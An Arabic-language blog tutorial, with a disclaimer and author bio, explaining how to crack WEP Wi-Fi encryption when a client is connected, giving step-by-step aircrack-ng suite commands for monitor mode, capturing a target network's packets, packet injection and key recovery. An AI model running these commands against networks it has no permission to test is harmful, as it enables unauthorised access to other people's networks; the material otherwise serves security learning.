تحدثنا سابقا عن فك تشفير شبكات الوايرس التي تستخدم تشفير WEP دون الحاجة الى لوجود أي جهاز (client) متصل بالشبكة الهدف باستخدام fake authentication attack و Korek chopchop attack اما اليوم فسنتكلم عن طريقة فك تشفير WEP بأقل من 5 دقائق في حالة وجود جهاز متصل بالشبكة الهدف (client).

 

ملاحظات:

– الشرح من توزيعة backtrack3 و باستخدام حزمة aircrack-ng ويمكن تطبيقه من اي توزيعة لينكس اخرى.
الفيديو للغرض التعليمي فقط و أنا غير مسؤول عن أي استخدام خاطئ للمعلومات المذكورة في الشرح.

 

الفيديو:

 

 

الخطوات:

1. سنحتاج الى وضع كرت الوايرلس في الـ monitor mode بتنفيذ الأمر:

airmon-ng start [interface]

interface هو اسم كرت الوايرلس في جهازك.

 

2. استخدام برنامج airodump-ng لمشاهدة الشبكات المتوفرة بتنفيذ الأمر:

airodump-ng [interface]

 

3. تشغيل برنامج airodump-ng لجمع الحزم من الشبكة الهدف

airodump-ng -c  [channel] –bssid [target BSSID] -w [out] [interface]

حيث:
channel القناة اللتي تعمل عليها الشبكة.
target BSSID الماك أدرس الخاص بشبكة الوايرلس.
out اسم الملف الذي ستحفظ فيه الحزم.

 

4. استخدام برنامج aireplay-ng لعمل packet injection (حقن للحزم) مما سيسرع عملة جمع الحزم بشكل كبير

aireplay-ng -2 -b [target BSSID] -h -t 1 [interface]

حيث:

target BSSID الماك أدرس الخاص بشبكة الوايرلس.
source MAC address الماك ادرس الخاص بالجهاز المتصل بالشبكة الهدف (الكلاينت).

 

5. فك التشفير بالستخدام برنامج aircrack-ng

aircrack-ng [file]

 

و أي استفسار اني حاضر, دمتم بود…

عن الكاتب:


‫زيد القريشي, Ethical Hacker مهتم في مجال الحماية والـ Penetration Testing. يملك خبرة في اختراق شبكات الوايرلس والبرمجة بلغة Python.

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn